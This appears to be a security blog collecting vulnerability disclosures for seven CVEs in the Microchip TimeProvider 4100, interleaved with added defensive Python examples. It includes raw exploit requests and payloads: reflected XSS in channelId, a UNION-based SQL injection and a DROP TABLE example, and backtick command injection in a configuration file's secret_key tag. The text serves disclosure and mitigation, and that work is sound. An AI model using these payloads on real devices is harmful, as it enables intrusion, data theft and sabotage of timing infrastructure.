Friday, October 25, 2024

CVE-2024-43685: MICROCHIP TIMEPROVIDER 4100 GRANDMASTER - Improper Authentication Vulnerability (Session Fixation)

The final finding from the analysis of the "TimeProvider 4100 Grandmaster" device revealed a Session Fixation vulnerability.

TimeProvider 4100 Grandmaster Device

The root of the issue lies in how the device manages user session cookies.

Specifically, the web interface issues a session cookie ci_session prior to user authentication, and this same cookie is retained and reused after login. The device does not regenerate the session identifier upon successful authentication, allowing a previously established session to become fully authenticated once a user logs in.

This creates a serious security risk: an attacker who can obtain or assign a session cookie to a victim before authentication can later hijack the session after the user logs in, without needing credentials.


Exploitation Steps

This vulnerability can be exploited through a Session Fixation attack using the following steps:

  1. The attacker initiates a session with the device and receives a valid ci_session cookie.

  2. The attacker sends the cookie to the victim, often through a phishing link or malicious iframe that sets the attacker-controlled session in the victim’s browser.

  3. The victim logs in to the device’s web interface while using the attacker-provided session.

  4. The session becomes authenticated—but the session ID has not changed, so the attacker can now reuse the same cookie to gain authenticated access as the victim.


Even after the user logs out, if the session is not properly invalidated server-side, the session may remain active or exploitable. 

Following the previously outlined details, the results of each step taken to exploit the vulnerability are presented below. The image illustrates a login request where the ci_session cookie is assigned an arbitrary value matching the length of the original session cookie:


After the login operation is completed, the device’s web server retains the same session cookie value. The following image illustrates this behavior during a request to the dashboard web resource:


The image below demonstrates the outcome of this session hijacking attack:


Key Proof-of-Concept Insight:

  • The attacker does not need to know the victim’s credentials.

  • They only need to ensure the victim authenticates using a session ID under the attacker’s control.


Recommended Mitigations:

  • Regenerate the session ID immediately upon successful login to ensure session isolation.

  • Invalidate session tokens upon logout and clear session data from memory.

  • Use secure cookie attributes (Secure, HttpOnly, SameSite) to reduce client-side exposure.

  • Monitor for reused or long-lived session IDs across IPs or geolocations.
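The Python model below is added here and is not the device's own code; it replays the four steps above against two versions of a session store and shows why regenerating the identifier at login, and invalidating it at logout, closes the hole. The store layout, the TTL and the cookie attributes are assumptions.

```python
import secrets
import time

SESSION_TTL = 3600  # seconds; assumed value, the device's real timeout is not on the page


class SessionStore:
    """Constructed in-memory session store. The cookie is called ci_session
    as on the device, but nothing else here mirrors the real firmware."""

    def __init__(self, regenerate_on_login: bool):
        self.regenerate_on_login = regenerate_on_login
        self._sessions = {}  # session id -> {"user": str | None, "created": float}

    def new_session(self) -> str:
        """Issue the pre-authentication session id (the cookie set before login)."""
        sid = secrets.token_hex(16)
        self._sessions[sid] = {"user": None, "created": time.time()}
        return sid

    def login(self, sid: str, user: str) -> str:
        """Authenticate the session; returns the id the client must use from now on."""
        if sid not in self._sessions:
            raise KeyError("unknown session")
        if self.regenerate_on_login:
            # Mitigation 1: discard the pre-auth id, so whoever else holds it
            # loses access, and bind the authenticated state to a fresh id.
            del self._sessions[sid]
            sid = secrets.token_hex(16)
            self._sessions[sid] = {"user": None, "created": time.time()}
        self._sessions[sid]["user"] = user
        return sid

    def logout(self, sid: str) -> None:
        """Mitigation 2: invalidate server-side rather than only expiring the cookie."""
        self._sessions.pop(sid, None)

    def authenticated_user(self, sid: str):
        entry = self._sessions.get(sid)
        if entry is None or time.time() - entry["created"] > SESSION_TTL:
            return None
        return entry["user"]


def fixation_succeeds(store: SessionStore) -> bool:
    """Regression check replaying the four steps from the post: does the
    identifier issued before login still work after the victim signs in?"""
    attacker_sid = store.new_session()        # step 1: a pre-auth cookie is obtained
    victim_sid = attacker_sid                 # step 2: the victim's browser carries that cookie
    store.login(victim_sid, "admin")          # step 3: the victim logs in with it
    return store.authenticated_user(attacker_sid) == "admin"   # step 4: still valid?


def set_cookie_header(sid: str) -> str:
    """Mitigation 3: cookie attributes that limit client-side exposure."""
    return f"Set-Cookie: ci_session={sid}; Secure; HttpOnly; SameSite=Strict; Path=/"
```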


Conclusion:

This vulnerability highlights a critical failure in session lifecycle management. By failing to regenerate session identifiers after login, the system is left open to session fixation attacks—making it possible for attackers to impersonate authenticated users without needing credentials.


Reporting Information:

CVE Identifier: CVE-2024-43685
CVSS Score: 8.7
Affected Versions: Firmware 1.0 through 2.4.7
Tested on: Firmware release 2.3.12 
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43685
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-session-token-fixation
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.

Wednesday, October 16, 2024

CVE-2024-43687: MICROCHIP TIMEPROVIDER 4100 GRANDMASTER DEVICE (BANNER) - STORED XSS

Carrying on with the analysis of the "TimeProvider 4100 grandmaster device", it was possible to identify a Stored Cross-Site Scripting (XSS) vulnerability in the custom banner configuration field.


TimeProvider 4100 Grandmaster Device

The embedded web server does not sanitize the "txtcustom" parameter and stores its value in the database. Any user who visits the device's web administration interface then receives the malicious JavaScript payload in the related server responses, and it is executed in the victim's browser.

Exploitation Steps

  1. Authenticate to the device’s management web interface.

  2. Open the banner configuration panel.

  3. Select the "custom banner" feature.

  4. Insert the malicious JavaScript payload.

  5. Apply and save the system configuration containing the custom banner.

  6. Trigger execution by connecting to the device's web management interface. The victim's connection initiates execution of the injected JavaScript payload.

The following image shows an example of a request containing the malicious JavaScript payload:


Request RAW:

POST /bannerconfig HTTP/1.1
Host: [device IP]
Cookie: ci_session=[session cookie]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------9680247575877256312575038502
Content-Length: 673
Origin: https://[device IP]
Referer: https://[device IP]/bannerconfig
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: keep-alive

-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="user_level"

1
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="bannerradio"

CUSTOMIZED
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="txtcustom"

[malicious JavaScript payload]
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="action"

applybanner
-----------------------------9680247575877256312575038502--

# End

Payload execution on the victim’s browser:



The injected JavaScript payload can also be seen by logging in to the device's SSH service. The following image shows an example of such a connection:



Conclusion:

A threat actor exploiting this vulnerability can perform phishing attacks and session hijacking, compromising the confidentiality, integrity and availability of the device.

Reporting Information:

CVE Identifier: CVE-2024-43687
CVSS Score: 8.0
Affected Versions: Firmware 1.0 through 2.4.7
Tested on: Firmware release 2.3.12 
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43687
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-stored-xss-vulnerability-in-banner
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.


Monday, October 14, 2024

CVE-2024-43683: MICROCHIP TIMEPROVIDER 4100 GRANDMASTER - URL REDIRECTION TO UNTRUSTED SITE ('Open Redirect') – CWE-601

Proceeding with the analysis of the “Microchip TimeProvider® 4100 Grandmaster TP4100” device, it was possible to identify a Host Header Injection vulnerability.

TimeProvider 4100 Grandmaster Device

The device fails to properly validate the Host header in HTTP GET and POST requests. This allows attackers to craft requests with arbitrary Host values, which the system accepts and processes without verification.

In observed cases, replacing the legitimate Host header with a malicious domain (e.g., pentester.com) results in the device accepting the request and redirecting users to the attacker-controlled domain.

This issue can be exploited to:

  • Perform phishing attacks by redirecting users to malicious websites that appear legitimate

  • Bypass access controls or URL-based filters in certain environments

  • Facilitate cache poisoning or other injection-based attacks

Since the device does not verify that the Host header matches its own hostname or expected domain, it becomes vulnerable to these types of manipulations.

Exploitation Steps

Here’s how an attacker could exploit this vulnerability:

  1. Craft an HTTP request (GET or POST) targeting the TimeProvider 4100’s web interface.

  2. Replace the Host header with a malicious domain under the attacker’s control—for example: Host: pentester.com

  3. Send the request to the device.

  4. The device processes the request and redirects the user to the attacker-specified domain.

  5. The victim may unknowingly land on a malicious page designed to mimic the legitimate interface or capture credentials.

This redirection can occur in browsers or applications that use absolute URLs based on the Host header, making it particularly dangerous in environments where external links are passed through the device.

The following image shows an example of a request containing a custom Host header owned by a malicious user. It's also possible to verify that the browser automatically redirects to the specified domain:


Request RAW:

GET /dashboard HTTP/1.1
Host: pentester.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: close


Recommendations:

  • Implement strict server-side validation of the Host header against an expected allowlist.

  • Reject or log requests with unexpected Host values.

  • Ensure any redirections or URL generations use fixed, server-side hostnames rather than user-supplied headers.

  • Apply firmware updates once an official patch is made available by Microchip.
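Added example (Python, not the vendor's code) of the first three recommendations: a Host header normaliser and allowlist check that logs every rejection, and a redirect builder that uses a fixed server-side origin instead of the request header. The allowlisted names, the canonical origin and the logger name are assumed values.

```python
import ipaddress
import logging
import re
from urllib.parse import quote

logger = logging.getLogger("tp4100.http")  # assumed logger name

# Assumed deployment values: the names and addresses under which the device
# is legitimately reached, and the canonical origin used to build redirects.
ALLOWED_HOSTS = {"tp4100.example.internal", "192.168.1.1"}
CANONICAL_ORIGIN = "https://tp4100.example.internal"

# host[:port], where host is a DNS name / IPv4 literal or a bracketed IPv6 literal
_HOST_RE = re.compile(
    r"^(?:\[(?P<v6>[0-9A-Fa-f:.]+)\]|(?P<name>[A-Za-z0-9.-]+))(?::(?P<port>\d{1,5}))?$"
)


def normalize_host(header: str):
    """Lowercase host part of a Host header without the port, or None when
    the header is malformed (path characters, spaces, missing brackets...)."""
    m = _HOST_RE.match(header.strip())
    if not m:
        return None
    if m.group("v6"):
        try:
            return str(ipaddress.IPv6Address(m.group("v6")))
        except ValueError:
            return None
    return m.group("name").lower().rstrip(".")


def host_is_allowed(header: str, allowed=ALLOWED_HOSTS) -> bool:
    """Strict allowlist check. Every rejection is logged, which also gives
    operators the signal the recommendations ask for: a request carrying a
    foreign Host such as pentester.com becomes visible instead of being served."""
    host = normalize_host(header or "")
    if host is None or host not in {h.lower() for h in allowed}:
        logger.warning("rejected request with unexpected Host header: %r", header)
        return False
    return True


def redirect_location(path: str) -> str:
    """Redirect targets are built from the fixed server-side origin, never
    from the request's Host header, and only same-origin paths are accepted."""
    if not path.startswith("/") or path.startswith("//"):
        raise ValueError("redirect path must be an absolute same-origin path")
    return CANONICAL_ORIGIN + quote(path, safe="/?&=%-._~")


def redirect_response(host_header: str, path: str):
    """Minimal handler for an endpoint that answers with a redirect (such as
    the post-login hop to /dashboard): 400 on a bad Host, else a 302 whose
    Location comes from the canonical origin. Returns (status, headers)."""
    if not host_is_allowed(host_header):
        return 400, {}
    return 302, {"Location": redirect_location(path)}
```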

Conclusion:

This vulnerability highlights a common but serious oversight: trusting user-supplied HTTP headers without validation. Host header injection can be leveraged for phishing, redirection, and other malicious activities—all without requiring access or authentication.

Reporting Information:

CVE Identifier: CVE-2024-43683
CVSS Score: 6.1
Affected Versions: Firmware 1.0 through 2.4.7
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43683
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-improper-verification-of-host-header
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.

Thursday, October 10, 2024

CVE-2024-7801: MICROCHIP TIMEPROVIDER 4100 GRANDMASTER - UNAUTHENTICATED SQL INJECTION

A deep analysis of the "TimeProvider 4100 grandmaster" device firmware revealed a SQL Injection vulnerability, specifically within the get_chart_data web resource.
The vulnerability arises from the improper handling of the channelId parameter, which is inserted directly into an SQL query (SQLite) without sanitization or validation.

TimeProvider 4100 Grandmaster Device

More critically, the channelId parameter is used to dynamically specify the table name in the SQL FROM clause. This design flaw allows unauthenticated attackers to manipulate the query structure, leading to arbitrary SQL execution on the device.

Successful exploitation could allow a threat actor to:

  • Extract sensitive internal data

  • Enumerate or alter database contents

  • Potentially affect system behavior depending on how data is used by other services

The vulnerability can be exploited remotely and without authentication, significantly increasing the potential risk to exposed devices.

Exploitation Steps

An attacker could exploit this vulnerability using the following approach:

  1. Send a crafted HTTP request to the vulnerable get_chart_data web endpoint.

  2. Manipulate the channelId parameter to inject SQL syntax that alters the intended query logic.

    • Example: Supplying a payload such as channelId=temperature_data; DROP TABLE logs;-- may result in destructive behavior depending on backend protections.

  3. Receive response data containing unintended results or confirmation of executed SQL commands.

An example of a malicious SQL payload is provided below:

SELECT%20sql%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20sqlite_master$20WHERE&20type='table'$20LIMIT%201%20OFFSET%200--

Request RAW:

POST /get_chart_data HTTP/1.1
Host: [device IP]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 146
Origin: https://[device IP]
Referer: https://[device IP]/perfmon_synce_stat
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive

metric=mtie_a&xRange=1&tStart=-1&channelName=tenMHz&channelId=

1_status%20UNION%20 [malicious SQL payload] %20UNION%20SELECT%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20tenMHz1

# End

Conclusion:

This vulnerability highlights the risks of dynamic query construction without proper input validation. The fact that the flaw is unauthenticated and affects a core web resource significantly elevates the impact and exploitability.
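Added example, not the device's code, of the query construction this conclusion calls for: SQLite identifiers cannot be bound as parameters, so channelId has to be validated against an allowlist of chart tables (derived from the catalogue) and quoted, while values such as tStart travel as bound parameters. Table and column names are assumptions modelled on the request body above.

```python
import re
import sqlite3

# Constructed in-memory database imitating per-channel statistics tables.
# Table and column names are assumptions modelled on the request body above
# (tenMHz1, mtie_a); nothing here touches the real firmware.
_SCHEMA = """
CREATE TABLE tenMHz1 (ts INTEGER, mtie_a REAL, tdev REAL);
INSERT INTO tenMHz1 VALUES (1, 0.5, 0.1), (2, 0.7, 0.2);
CREATE TABLE users (name TEXT, pw_hash TEXT);
INSERT INTO users VALUES ('admin', 'constructed-hash');
"""
ALLOWED_METRICS = {"mtie_a", "tdev"}  # column allowlist for the metric parameter
_IDENT_RE = re.compile(r"^[A-Za-z][A-Za-z0-9_]{0,31}$")


def open_demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(_SCHEMA)
    return conn


def vulnerable_query(channel_id: str, metric: str) -> str:
    """The pattern the post describes: channelId is concatenated straight into
    the FROM clause, so whoever controls it controls the query structure."""
    return f"SELECT ts, {metric} FROM {channel_id}"


def chart_tables(conn) -> set:
    """Tables a chart may read: taken from the catalogue minus the internal
    ones, so the allowlist follows the schema without manual upkeep."""
    rows = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT IN ('users')"
    )
    return {r[0] for r in rows}


def safe_chart_data(conn, channel_id: str, metric: str, t_start: int) -> list:
    """Hardened version: identifiers are checked against an allowlist and
    quoted, values are bound parameters, and the caller can only choose
    *which* approved table and column are read, never the statement shape."""
    if not _IDENT_RE.match(channel_id) or channel_id not in chart_tables(conn):
        raise ValueError(f"unknown channelId {channel_id!r}")
    if metric not in ALLOWED_METRICS:
        raise ValueError(f"unknown metric {metric!r}")
    # Identifiers cannot be bound with '?'; quote them only after validation.
    sql = f'SELECT ts, "{metric}" FROM "{channel_id}" WHERE ts >= ? ORDER BY ts'
    return conn.execute(sql, (t_start,)).fetchall()


def channel_id_accepted(conn, channel_id: str) -> bool:
    """Does the hardened path accept this channelId value?"""
    try:
        safe_chart_data(conn, channel_id, "mtie_a", 0)
        return True
    except ValueError:
        return False
```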

Reporting Information:

CVE Identifier: CVE-2024-7801
CVSS Score: 6.3
Affected Versions: Firmware 1.0 through 2.4.7
Tested on: Firmware release 2.3.12 
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-7801
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-unathenticated-sql-injection
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.

Wednesday, October 09, 2024

CVE-2024-9054: MICROCHIP TIMEPROVIDER® 4100 GRANDMASTER CONFIG FILE - REMOTE CODE EXECUTION (RCE)

Continuing with the analysis of the "TimeProvider 4100 grandmaster device", a Remote Code Execution (RCE) vulnerability has been identified.

TimeProvider 4100 Grandmaster Device

The issue stems from the improper handling of user input within the device’s configuration file, specifically the <secret_key> XML tag.

An attacker with access to the device’s management web interface can modify the configuration file to include a malicious payload in the secret_key field. When this modified configuration is uploaded and restored, the payload remains dormant until a login attempt is made through any active service, such as SSH, Telnet, or the console interface.

Upon login, the system processes the malicious payload, leading to execution of arbitrary operating system commands with the privileges of the underlying system.

Exploitation Steps

  1. Authenticate to the device’s management web interface.

  2. Download the current configuration file from the interface.

  3. Modify the <secret_key> field in the configuration file, inserting a malicious OS command or script.

  4. Save the modified configuration file.

  5. Restore and apply the configuration using the device’s upload function.

  6. Trigger execution by logging in through any enabled service (e.g., SSH, Telnet, or the console). This login action initiates execution of the injected command.

An example of a malicious XML configuration file is provided below:

<?xml version="1.0"?>
[...]
<security>
    [...]
    <server>
        <ip>192.168.1.1</ip>
        <secret_key>`ping 192.168.1.20`</secret_key>
        [...]
    </server>
    [...]
</security>
[...]

Request RAW:

POST /config_restore HTTP/1.1
Host: [device IP]
Cookie: ci_session=[session cookie]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------182708909322642582691204887002
Content-Length: 206640
Origin: https://[device IP]
Referer: https://[device IP]/configbackuprestore
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive

-----------------------------182708909322642582691204887002
Content-Disposition: form-data; name="file"; filename="tp4100_cfg.txt"
Content-Type: text/plain

[XML configuration file containing the injection on "secret_key" tag]
-----------------------------182708909322642582691204887002
Content-Disposition: form-data; name="pword"

[Web account password in clear-text]
-----------------------------182708909322642582691204887002--

# End

Conclusion:

This vulnerability can result in full system compromise, allowing an attacker to execute unauthorized commands, establish persistent root access, or disrupt normal device operation.
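Added example (Python, not Microchip's code) of two defensive measures for this class of bug: a restore-time check over the sample configuration shown above, which rejects a secret_key that does not match the expected shape or contains shell metacharacters, and the way a login-time consumer should hand the key to a helper so that no shell ever interprets it. The secret-key policy and the helper path are assumptions.

```python
import re
import subprocess
import xml.etree.ElementTree as ET

# The post's sample configuration fragment, reduced to the elements the check
# needs (the [...] parts are not on the page and are left out).
SAMPLE_CONFIG = """<?xml version="1.0"?>
<config>
 <security>
  <server>
   <ip>192.168.1.1</ip>
   <secret_key>`ping 192.168.1.20`</secret_key>
  </server>
 </security>
</config>"""

# Assumed policy: a shared secret for a server entry is printable ASCII
# without whitespace, 1..64 characters.
_SECRET_RE = re.compile(r"^[\x21-\x7e]{1,64}$")
_SHELL_META = set("`$;|&<>(){}\n\r'\"\\")


def validate_secret_key(value) -> bool:
    """Accept only values matching the expected shape. Shell metacharacters
    are rejected explicitly so the reason stays obvious even if the regex
    policy is relaxed later."""
    if not isinstance(value, str) or not _SECRET_RE.match(value):
        return False
    return not (_SHELL_META & set(value))


def check_restored_config(xml_text: str) -> list:
    """Problems found in a configuration file uploaded for restore.
    An empty list means the file may be applied."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return [f"malformed XML: {exc}"]
    problems = []
    for server in root.iter("server"):
        ip = (server.findtext("ip") or "").strip()
        if not validate_secret_key(server.findtext("secret_key")):
            problems.append(f"server {ip or '?'}: secret_key fails validation")
    return problems


def build_auth_helper_argv(ip: str, secret_key: str) -> list:
    """How the login-time consumer should invoke whatever helper needs the
    key: an argv list with shell=False, so the bytes are passed verbatim and
    no shell parses them, and the secret itself on stdin rather than on the
    command line. The helper path is a placeholder."""
    if not validate_secret_key(secret_key):
        raise ValueError("refusing to use an invalid secret_key")
    return ["/usr/sbin/auth-helper", "--server", ip, "--secret-from-stdin"]


def run_auth_helper(ip: str, secret_key: str) -> subprocess.CompletedProcess:
    # Not executed by the tests; shown for the call shape only.
    return subprocess.run(build_auth_helper_argv(ip, secret_key), shell=False,
                          input=secret_key.encode(), capture_output=True, check=False)
```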

Reporting Information:

CVE Identifier: CVE-2024-9054
CVSS Score: 8.5
Affected Versions: Firmware 1.0 through 2.4.7
Tested on: Firmware release 2.3.12 
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-9054
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-rce-through-configuration-file
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.

Tuesday, October 08, 2024

CVE-2024-43686: MICROCHIP TIMEPROVIDER 4100 GRANDMASTER - REFLECTED CROSS-SITE SCRIPTING XSS

While examining the administrative interface of the “Microchip TimeProvider® 4100 Grandmaster TP4100” device, the following was observed.

TimeProvider 4100 Grandmaster Device

A particular parameter, channelId, reflects its content in the embedded web server's responses; specifically, in the request that updates the charts.

Pursuing this, after several attempts it was possible to inject a JavaScript payload between <script> tags, resulting in a Reflected Cross-Site Scripting vulnerability. The following image shows an example of a request containing the malicious JavaScript payload:




Request RAW:

POST /get_chart_data HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 99
Origin: https://XXX.XXX.XXX.XXX
Referer: https://XXX.XXX.XXX.XXX/perfmon_t1e1_stat
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive

metric=mtie_a&xRange=1&tStart=-1&channelName=span&channelId=1%3cscript%3ealert(1)%3c%2fscript%3easd

Payload execution on the victim’s browser:




Conclusion:

An unauthenticated user can insert JavaScript snippets into the channelId parameter of the specified POST request to the get_chart_data web resource. In the worst case, attackers are able to perform privileged operations by stealing an administrative user’s session, or to gain access to sensitive information belonging to the user.
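Both this finding and the stored XSS in the banner (CVE-2024-43687) come down to untrusted text being written into a response without encoding for the context it lands in. The added example below (Python, not the device's code; sample inputs are constructed) shows the two encodings involved: HTML-body encoding for the stored banner, which is also stripped of control characters for the SSH/console banner, and JavaScript-string encoding for a value reflected inside a <script> block, where JSON quoting alone does not stop a </script> break-out.

```python
import html
import json
import re

# Constructed sample inputs, not taken from the device: a banner text of the
# kind stored through "txtcustom", and a channelId value of the kind reflected
# by get_chart_data.
BANNER_INPUT = '<img src=x onerror="alert(1)">Authorized users only'
CHANNEL_INPUT = '1</script><script>alert(1)</script>asd'

_CHANNEL_ID_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")  # assumed identifier shape


def render_banner_html(text: str) -> str:
    """HTML-body context: the stored banner is data, so every HTML
    metacharacter is entity-encoded before it enters the page."""
    return f'<pre class="banner">{html.escape(text, quote=True)}</pre>'


def render_banner_terminal(text: str) -> str:
    """The same banner is shown on SSH/console login; drop control characters
    and escape sequences so the text cannot drive the terminal either."""
    return "".join(ch for ch in text if ch.isprintable() or ch in "\n\t")


def js_string_literal(value: str) -> str:
    """JavaScript-string context inside an inline <script>. JSON encoding
    takes care of quotes and backslashes but not of the HTML parser, which
    ends the script element at the first '</script>' whatever the quoting;
    escaping '<', '>' and '&' as \\uXXXX keeps both parsers happy."""
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def channel_id_is_valid(channel_id: str) -> bool:
    """channelId names a channel, not free text: validate its shape first."""
    return bool(_CHANNEL_ID_RE.match(channel_id))


def render_chart_script(channel_id: str) -> str:
    """Reflect channelId into the chart-update script: validate, then encode
    for the script-string context anyway (defence in depth)."""
    if not channel_id_is_valid(channel_id):
        raise ValueError("invalid channelId")
    return f"<script>updateChart({js_string_literal(channel_id)});</script>"


def script_context_is_safe(rendered: str) -> bool:
    """An inline script rendered from untrusted input must still contain
    exactly one opening and one closing script tag."""
    lowered = rendered.lower()
    return lowered.count("<script") == 1 and lowered.count("</script") == 1
```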
 

Reporting Information:

CVE Identifier: CVE-2024-43686
CVSS Score: 8.0
Affected Versions: Firmware 1.0 through 2.4.7
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43686
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-reflected-xss-vulnerability
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.

Monday, October 07, 2024

CVE-2024-43684: MICROCHIP TIMEPROVIDER 4100 GRANDMASTER - CROSS-SITE REQUEST FORGERY (CSRF) - CWE-352

Proceeding with the analysis of the "TimeProvider 4100 grandmaster" device, it was possible to identify a Cross-Site Request Forgery (CSRF) vulnerability.


TimeProvider 4100 Grandmaster Device

The device’s web interface does not implement anti-CSRF tokens, leaving it susceptible to malicious requests being submitted on behalf of an authenticated user.

CSRF attacks exploit the trust a web application places in a user’s browser. Without CSRF protections in place, an attacker can craft a malicious web page that, when visited by an authenticated user, silently sends unauthorized requests to the device—executing actions with the user’s privileges.

In this case, the vulnerability allows attackers to modify system parameters or UI elements without user consent. 

For example, the following proof-of-concept (PoC) demonstrates changing the web interface banner to display the text “CSRFATTACK”.

CSRF Attack PoC

Exploitation Steps

An attacker could exploit this vulnerability as follows:

  1. The victim logs into the TimeProvider 4100 web interface and retains an active session.

  2. The victim visits a malicious webpage crafted by the attacker.

  3. The page contains hidden HTML or JavaScript code that issues an authenticated request to the device (e.g., modifying configuration or display elements).

  4. The device processes the request, assuming it was legitimately issued by the user.


The following image shows the device's web interface banner modified as a result of the CSRF attack:


Recommended Mitigations:

  • Implement anti-CSRF tokens in all state-changing HTTP requests to ensure they originate from legitimate sources.

  • Use the SameSite attribute in cookies to reduce cross-origin request risks.

  • Educate users to avoid visiting untrusted links while logged into administrative systems.

  • Restrict access to the device’s web interface to only trusted networks and users.
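Added Python example, not the device's code, of the first two mitigations applied to the banner endpoint used in the PoC: a per-session synchronizer token compared in constant time, and a Sec-Fetch-Site check as a second, independent layer. The endpoint and field names follow the posts on this page; the session handling is a simplified dict.

```python
import hmac
import secrets


class CsrfGuard:
    """Synchronizer-token pattern: one unpredictable token per session,
    embedded in the legitimate form and required on every state change."""

    def __init__(self):
        self._tokens = {}   # session id -> per-session CSRF token

    def token_for(self, session_id: str) -> str:
        """Issue (once per session) the token the legitimate form embeds."""
        if session_id not in self._tokens:
            self._tokens[session_id] = secrets.token_urlsafe(32)
        return self._tokens[session_id]

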